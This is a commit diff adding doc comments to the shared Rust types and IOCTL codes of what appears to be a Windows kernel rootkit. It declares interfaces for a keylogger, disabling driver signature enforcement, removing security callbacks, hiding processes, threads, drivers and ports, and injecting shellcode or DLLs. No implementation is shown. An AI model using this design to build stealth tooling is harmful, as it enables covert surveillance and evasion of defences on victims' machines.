refactor(shared): Refactoring and adding documentation for clarity

shared/.gitignore

@@ -1 +0,0 @@
-/target

shared/src/enums.rs

@@ -0,0 +1,30 @@
+#[derive(Debug, Copy, Clone, PartialEq, Default)]
+pub enum Callbacks {
+    #[default]
+    PsSetCreateProcessNotifyRoutine,
+    PsSetCreateThreadNotifyRoutine,
+    PsSetLoadImageNotifyRoutine,
+    CmRegisterCallbackEx,
+    ObProcess,
+    ObThread,
+}
+
+#[derive(Debug)]
+pub enum Options {
+    Hide,
+    Protection,
+}
+
+/// Represents the type of protocol (TCP/UDP).
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum Protocol {
+    TCP,
+    UDP,
+}
+
+/// Represents whether the port is local or remote.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum PortType {
+    LOCAL,
+    REMOTE,
+}

shared/src/ioctls.rs

@@ -32,26 +32,29 @@ pub const IOCTL_ENABLE_DSE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x811, METHOD_N
 pub const IOCTL_KEYLOGGER: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x812, METHOD_NEITHER, FILE_ANY_ACCESS);
 
 // ETWTI
-pub const IOCTL_ETWTI: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x827, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_ETWTI: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x813, METHOD_NEITHER, FILE_ANY_ACCESS);
+
+// PORT
+pub const IOCTL_PORT: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x814, METHOD_NEITHER, FILE_ANY_ACCESS);
 
 // Callbacks
-pub const IOCTL_ENUMERATE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x813, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_REMOVE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x814, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_RESTORE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x815, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_ENUMERATE_REMOVED_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x816, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_ENUMERATE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x815, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_REMOVE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x816, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_RESTORE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x817, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_ENUMERATE_REMOVED_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x818, METHOD_NEITHER, FILE_ANY_ACCESS);
 
 // Registry
-pub const IOCTL_REGISTRY_PROTECTION_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x817, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_REGISTRY_PROTECTION_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x818, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_HIDE_UNHIDE_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x819, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_HIDE_UNHIDE_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x820, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_REGISTRY_PROTECTION_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x819, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_REGISTRY_PROTECTION_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x820, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_HIDE_UNHIDE_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x821, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_HIDE_UNHIDE_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x822, METHOD_NEITHER, FILE_ANY_ACCESS);
 
 // Module
-pub const IOCTL_ENUMERATE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x821, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_HIDE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x822, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_ENUMERATE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x823, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_HIDE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x824, METHOD_NEITHER, FILE_ANY_ACCESS);
 
 // Injection
-pub const IOCTL_INJECTION_SHELLCODE_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x823, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_INJECTION_SHELLCODE_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x824, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_INJECTION_DLL_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x825, METHOD_NEITHER, FILE_ANY_ACCESS);
-pub const IOCTL_INJECTION_DLL_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x826, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_INJECTION_SHELLCODE_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x825, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_INJECTION_SHELLCODE_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x826, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_INJECTION_DLL_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x827, METHOD_NEITHER, FILE_ANY_ACCESS);
+pub const IOCTL_INJECTION_DLL_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x828, METHOD_NEITHER, FILE_ANY_ACCESS);

shared/src/lib.rs

@@ -3,5 +3,6 @@
 extern crate alloc;
 
 pub mod ioctls;
+pub mod structs;
 pub mod vars;
-pub mod structs;
+pub mod enums;

shared/src/structs/callback.rs

@@ -1,20 +1,39 @@
-use crate::vars::Callbacks;
+use crate::enums::Callbacks;
 
-// Callback Information for Enumeration (Output)
+/// Callback Information for Enumeration (Output)
+///
+/// This struct represents the information about a callback that is used in an enumeration process.
+/// It includes details like the callback's memory address, name, and operations associated with it.
 #[repr(C)]
-#[derive(Debug)]
+#[derive(Debug, Copy, Clone)]
 pub struct CallbackInfoOutput {
+    /// The memory address where the callback is located.
     pub address: usize,
+    
+    /// The name of the callback, represented as a UTF-16 array of fixed length (256).
+    /// This is useful for systems (like Windows) that use UTF-16 strings.
     pub name: [u16; 256],
+    
+    /// The index of the callback in the enumeration.
     pub index: u8,
+    
+    /// The memory address of the pre-operation function associated with this callback.
     pub pre_operation: usize,
-    pub post_operation: usize
+    
+    /// The memory address of the post-operation function associated with this callback.
+    pub post_operation: usize,
 }
 
-// Callback Information for Action (Input)
+/// Callback Information for Action (Input)
+///
+/// This struct is used to represent input data when performing an action on a callback.
+/// It includes the callback's index and the specific callback action to be taken.
 #[repr(C)]
-#[derive(Debug)]
+#[derive(Debug, Copy, Clone)]
 pub struct CallbackInfoInput {
+    /// The index of the callback that will be targeted by the action.
     pub index: usize,
-    pub callback: Callbacks
-}
+    
+    /// The specific callback action, represented by the `Callbacks` enum.
+    pub callback: Callbacks,
+}

shared/src/structs/driver.rs

@@ -1,35 +1,65 @@
-use core::sync::atomic::AtomicPtr;
 use super::LIST_ENTRY;
+use core::sync::atomic::AtomicPtr;
 use ntapi::ntldr::LDR_DATA_TABLE_ENTRY;
 
-// Enumerate Drivers
+/// Enumerates driver information for system drivers.
+///
+/// This struct holds basic information about a driver, including its address, name, and an index
+/// for identification. The `name` field is represented as a UTF-16 array to maintain compatibility 
+/// with systems that use this encoding (like Windows).
 #[repr(C)]
 pub struct DriverInfo {
+    /// The memory address where the driver is loaded.
     pub address: usize,
+    
+    /// The name of the driver, stored as a UTF-16 encoded string with a fixed length of 256.
     pub name: [u16; 256],
+    
+    /// The index of the driver in the enumeration.
     pub index: u8,
 }
 
-// Enable / Disable DSE
+/// Represents a structure to enable or disable Driver Signature Enforcement (DSE).
+///
+/// This struct is used to toggle the state of DSE, with the `enable` field indicating whether
+/// DSE is currently enabled or disabled.
 #[repr(C)]
 #[derive(Debug)]
 pub struct DSE {
-    pub enable: bool
+    /// A boolean flag to enable or disable DSE. `true` means DSE is enabled, `false` means it is disabled.
+    pub enable: bool,
 }
 
-// Structure that stores the values of the process that has been hidden
+/// Stores the values related to a hidden driver.
+///
+/// This struct is used to keep track of a driver that has been hidden from the system. It stores 
+/// the driver's name and relevant pointers to system structures such as the driver's list entry and 
+/// data table entry.
 #[repr(C)]
 #[derive(Debug)]
-pub struct HiddenDriverInfo  {
+pub struct HiddenDriverInfo {
+    /// The name of the hidden driver as a dynamic string (heap-allocated).
     pub name: alloc::string::String,
+    
+    /// A pointer to the `LIST_ENTRY` structure representing the driver's list in the system.
     pub list_entry: AtomicPtr<LIST_ENTRY>,
+    
+    /// A pointer to the `LDR_DATA_TABLE_ENTRY` structure that represents the driver's data in the system.
     pub driver_entry: AtomicPtr<LDR_DATA_TABLE_ENTRY>,
 }
 
-// Represents a drivers information, including its name and a flag indicating whether it should be hidden or not
+
+/// Represents the target driver for operations like hiding or revealing it.
+///
+/// This struct holds information about a driver, specifically its name and a flag indicating whether 
+/// it should be enabled (visible) or hidden.
 #[repr(C)]
 #[derive(Debug, Default)]
 pub struct TargetDriver {
+    /// The name of the target driver as a dynamic string (heap-allocated).
     pub name: alloc::string::String,
+    
+    /// A boolean flag that indicates whether the driver is enabled (visible) or hidden. 
+    /// `true` means the driver is enabled, `false` means it is hidden.
     pub enable: bool,
-}
+}

shared/src/structs/injection.rs

@@ -1,6 +0,0 @@
-
-
-pub struct TargetInjection {
-    pub pid: usize,
-    pub path: alloc::string::String
-}

shared/src/structs/mod.rs

@@ -1,50 +1,130 @@
 #![allow(non_camel_case_types)]
 #![allow(non_snake_case)]
 
-use crate::vars::Options;
+use crate::enums::Options;
+use crate::enums::{PortType, Protocol};
 
 pub use {
-    process::*,
+    callback::*, 
     driver::*,
+    module::*, 
+    process::*,
     thread::*,
-    callback::*,
-    registry::*,
-    module::*,
-    injection::*,
 };
 
-pub mod process;
-pub mod thread;
 pub mod callback;
 pub mod driver;
-pub mod registry;
 pub mod module;
-pub mod injection;
+pub mod process;
+pub mod thread;
 
-// Custom LIST_ENTRY
+/// Custom implementation of the `LIST_ENTRY` structure.
+///
+/// This struct represents a doubly linked list entry, commonly used in low-level
+/// systems programming, especially in Windows kernel structures. It contains
+/// forward (`Flink`) and backward (`Blink`) pointers to other entries in the list.
 #[repr(C)]
 #[derive(Debug, Clone, Copy)]
 pub struct LIST_ENTRY {
+    /// A pointer to the next entry in the list.
     pub Flink: *mut LIST_ENTRY,
+    
+    /// A pointer to the previous entry in the list.
     pub Blink: *mut LIST_ENTRY,
 }
 
-// Keylogger
+/// Represents the state of the keylogger system.
+///
+/// This struct is used to manage whether the keylogger functionality is enabled
+/// or disabled. The `enable` field indicates if the keylogger is active.
 #[repr(C)]
 #[derive(Debug)]
 pub struct Keylogger {
-    pub enable: bool
+    /// A boolean value indicating if the keylogger is enabled (`true`) or disabled (`false`).
+    pub enable: bool,
 }
 
-// ETWTI
+/// Represents the state of ETWTI (Event Tracing for Windows Thread Information).
+///
+/// This struct manages whether ETWTI is enabled or disabled for capturing thread
+/// information. The `enable` field controls the activation of this feature.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ETWTI {
-    pub enable: bool
+    /// A boolean value indicating if ETWTI is enabled (`true`) or disabled (`false`).
+    pub enable: bool,
 }
 
-// Input for information that needs to be listed
+/// Input structure for enumeration of information.
+///
+/// This struct is used as input for listing various entities, based on the
+/// options provided. The `options` field defines the parameters for the enumeration.
 #[repr(C)]
+#[derive(Debug)]
 pub struct EnumerateInfoInput {
-    pub options: Options
+    /// The options to control how the enumeration should behave, typically set by the user.
+    pub options: Options,
 }
+
+/// Represents the target process and path for a DLL or code injection.
+///
+/// This struct contains the necessary information to perform a code or DLL injection
+/// into a target process. It includes the process identifier (PID) and the path
+/// to the file or resource being injected.
+#[repr(C)]
+#[derive(Debug)]
+pub struct TargetInjection {
+    /// The process identifier (PID) of the target process where the injection will occur.
+    pub pid: usize,
+    
+    /// The path to the file or resource (typically a DLL) to be injected into the process.
+    /// This is a dynamic string (heap-allocated) that stores the full path.
+    pub path: alloc::string::String,
+}
+
+/// Represents information about a network or communication port.
+///
+/// This struct holds information about a specific port, including the protocol used,
+/// the type of port, its number, and whether the port is enabled or disabled. 
+/// It is marked as `#[repr(C)]` for compatibility with C-style layouts, making it suitable for
+/// FFI (Foreign Function Interface) and low-level systems programming.
+#[repr(C)]
+#[derive(Debug, Clone, Copy, PartialEq)]
+pub struct PortInfo {
+    /// The protocol used by the port (e.g., TCP, UDP).
+    /// This field is represented by the `Protocol` enum.
+    pub protocol: Protocol,
+
+    /// The type of port (e.g., open, filtered).
+    /// This field is represented by the `PortType` enum.
+    pub port_type: PortType,
+
+    /// The port number, represented as a 16-bit unsigned integer.
+    /// Commonly used to identify network services (e.g., port 80 for HTTP).
+    pub port_number: u16,
+
+    /// A boolean value indicating whether the port is enabled (`true`) or disabled (`false`).
+    pub enable: bool,
+}
+
+/// Represents the target registry key and value for operations.
+///
+/// This struct holds information about a specific registry key and its associated value
+/// for operations such as modifying or querying the registry. It includes the registry key,
+/// the value associated with that key, and a flag indicating whether the operation should be
+/// enabled or not.
+#[repr(C)]
+#[derive(Debug, Default)]
+pub struct TargetRegistry {
+    /// The registry key, represented as a dynamically allocated string.
+    /// This is typically the path to a specific registry key (e.g., `HKEY_LOCAL_MACHINE\Software\...`).
+    pub key: alloc::string::String,
+
+    /// The value associated with the registry key, represented as a dynamically allocated string.
+    /// This could be a string value stored under the specified registry key.
+    pub value: alloc::string::String,
+
+    /// A boolean value indicating whether the operation on the registry key should be enabled (`true`)
+    /// or disabled (`false`).
+    pub enable: bool,
+}

shared/src/structs/module.rs

@@ -1,16 +1,32 @@
-// Enumerate Modules
+/// Represents information about a module in the system.
+///
+/// This struct is used for enumerating modules loaded in the system. It includes
+/// the module's memory address, its name, and an index that can be used for
+/// identification or sorting purposes.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ModuleInfo {
+    /// The memory address where the module is loaded.
     pub address: usize,
+
+    /// The name of the module, stored as a UTF-16 encoded string with a fixed length of 256.
+    /// This allows compatibility with systems like Windows that use UTF-16 encoding.
     pub name: [u16; 256],
+
+    /// The index of the module in the enumeration, useful for tracking or identifying the module.
     pub index: u8,
 }
 
-// Enumerate Modules
+/// Represents the target module within a specific process for operations like enumeration or manipulation.
+///
+/// This struct contains information about the target process and the specific module within that process.
+/// It includes the process identifier (PID) and the name of the module being targeted.
 #[repr(C)]
 #[derive(Debug)]
 pub struct TargetModule {
+    /// The process identifier (PID) of the process in which the target module is loaded.
     pub pid: usize,
+
+    /// The name of the target module, stored as a dynamically allocated string.
     pub module_name: alloc::string::String,
 }

shared/src/structs/process.rs

@@ -1,49 +1,84 @@
-use core::sync::atomic::AtomicPtr;
 use super::LIST_ENTRY;
+use core::sync::atomic::AtomicPtr;
 
-// Stores the information of the process that has been hidden
+/// Stores information about a process that has been hidden from the system.
+///
+/// This struct holds the process identifier (PID) and a pointer to the process's
+/// `LIST_ENTRY`, which is part of the system's internal list management structure.
+/// The `AtomicPtr` ensures safe concurrent access to the `LIST_ENTRY`.
 #[repr(C)]
 #[derive(Debug)]
-pub struct HiddenProcessInfo  {
+pub struct HiddenProcessInfo {
+    /// The process identifier (PID) of the hidden process.
     pub pid: usize,
-    pub list_entry: AtomicPtr<LIST_ENTRY>
+    
+    /// A pointer to the `LIST_ENTRY` structure, which is used to represent the process
+    /// in the system's linked list of processes. This is wrapped in an `AtomicPtr` for safe concurrent access.
+    pub list_entry: AtomicPtr<LIST_ENTRY>,
 }
 
-// Stores process information
+/// Represents basic information about a process.
+///
+/// This struct is used to store the PID of a process.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ProcessListInfo {
+    /// The process identifier (PID) of the process.
     pub pids: usize,
 }
 
-// Stores information about the target process
+/// Stores information about a target process for operations such as termination or manipulation.
+///
+/// This struct contains the process identifier (PID) of the target process. It is commonly used 
+/// when the PID is the only information required for an operation on a process.
 #[repr(C)]
 #[derive(Debug, Default)]
 pub struct TargetProcess {
+    /// The process identifier (PID) of the target process.
     pub pid: usize,
 }
 
-// Process Info Hide
+/// Represents the state of a process with respect to hiding or visibility.
+///
+/// This struct stores the PID of a process and a boolean flag that indicates whether the process 
+/// is hidden (`true`) or visible (`false`).
 #[repr(C)]
 #[derive(Debug, Default)]
 pub struct ProcessInfoHide {
+    /// The process identifier (PID) of the process.
     pub pid: usize,
+    
+    /// A boolean value indicating whether the process is hidden (`true`) or visible (`false`).
     pub enable: bool,
 }
 
-// Signature information for the target process
+/// Stores signature information for a target process.
+///
+/// This struct holds information about the signature of a process, such as its PID, signer (sg),
+/// and type (tp), which might represent the level or type of protection applied to the process.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ProcessSignature {
+    /// The process identifier (PID) of the target process.
     pub pid: usize,
+
+    /// The signer of the process, typically indicating the authority or certificate that signed it.
     pub sg: usize,
+
+    /// The type of protection applied to the process, represented as an integer.
     pub tp: usize,
 }
 
-// Stores the process to be protected
+/// Stores information about whether a process is protected.
+///
+/// This struct holds the process identifier (PID) and a flag indicating whether the process is
+/// protected. It is used to manage processes that have protection mechanisms enabled or disabled.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ProcessProtection {
+    /// The process identifier (PID) of the process to be protected.
     pub pid: usize,
-    pub enable: bool
-}
+
+    /// A boolean flag indicating whether the process is protected (`true`) or unprotected (`false`).
+    pub enable: bool,
+}

shared/src/structs/registry.rs

@@ -1,8 +0,0 @@
-// Stores the target registry
-#[repr(C)]
-#[derive(Debug, Default)]
-pub struct TargetRegistry {
-    pub key: alloc::string::String,
-    pub value: alloc::string::String,
-    pub enable: bool
-}

shared/src/structs/thread.rs

@@ -1,33 +1,56 @@
-use core::sync::atomic::AtomicPtr;
 use super::LIST_ENTRY;
+use core::sync::atomic::AtomicPtr;
 
-// Structure that stores the values of the process that has been hidden
+/// Stores information about a thread that has been hidden from the system.
+///
+/// This struct holds the thread identifier (TID) and a pointer to the thread's
+/// `LIST_ENTRY`, which is part of the system's internal list management structure.
+/// The `AtomicPtr` ensures safe concurrent access to the `LIST_ENTRY`.
 #[repr(C)]
 #[derive(Debug)]
-pub struct HiddenThreadInfo  {
+pub struct HiddenThreadInfo {
+    /// The thread identifier (TID) of the hidden thread.
     pub tid: usize,
-    pub list_entry: AtomicPtr<LIST_ENTRY>
+    
+    /// A pointer to the `LIST_ENTRY` structure, which represents the thread in the system's 
+    /// linked list of threads. This is wrapped in an `AtomicPtr` for safe concurrent access.
+    pub list_entry: AtomicPtr<LIST_ENTRY>,
 }
 
-// Stores the target thread
+/// Represents the target thread for operations like manipulation or monitoring.
+///
+/// This struct contains the thread identifier (TID) and a boolean flag indicating whether
+/// the thread is enabled or disabled (hidden or active).
 #[repr(C)]
 #[derive(Debug, Default)]
 pub struct TargetThread {
+    /// The thread identifier (TID) of the target thread.
     pub tid: usize,
+
+    /// A boolean value indicating whether the thread is enabled (`true`) or disabled/hidden (`false`).
     pub enable: bool,
 }
 
-// Stores thread information
+/// Stores basic information about a thread.
+///
+/// This struct is used to store the TID of a thread, typically for enumeration or tracking.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ThreadListInfo {
+    /// The thread identifier (TID) of the thread.
     pub tids: usize,
 }
 
-// Stores the thread to be protected
+/// Stores information about whether a thread is protected.
+///
+/// This struct holds the thread identifier (TID) and a flag indicating whether the thread
+/// is protected or not. It can be used to manage or toggle protection mechanisms for a thread.
 #[repr(C)]
 #[derive(Debug)]
 pub struct ThreadProtection {
+    /// The thread identifier (TID) of the thread to be protected.
     pub tid: usize,
-    pub enable: bool
+
+    /// A boolean flag indicating whether the thread is protected (`true`) or unprotected (`false`).
+    pub enable: bool,
 }

shared/src/vars.rs

@@ -1,20 +1,6 @@
-pub const MAX_PIDS: usize = 256;
+pub const MAX_PID: usize = 256;
 pub const MAX_DRIVER: usize = 256;
-pub const MAX_TIDS: usize = 256;
-
-#[derive(Debug, Copy, Clone, PartialEq, Default)]
-pub enum Callbacks {
-    #[default]
-    PsSetCreateProcessNotifyRoutine,
-    PsSetCreateThreadNotifyRoutine,
-    PsSetLoadImageNotifyRoutine,
-    CmRegisterCallbackEx,
-    ObProcess,
-    ObThread,
-}
-
-#[derive(Debug)]
-pub enum Options {
-    Hide,
-    Protection
-}
+pub const MAX_TID: usize = 256;
+pub const MAX_PORT: usize = 100;
+pub const MAX_REGISTRY: usize = 100;
+pub const MAX_CALLBACK: usize = 100;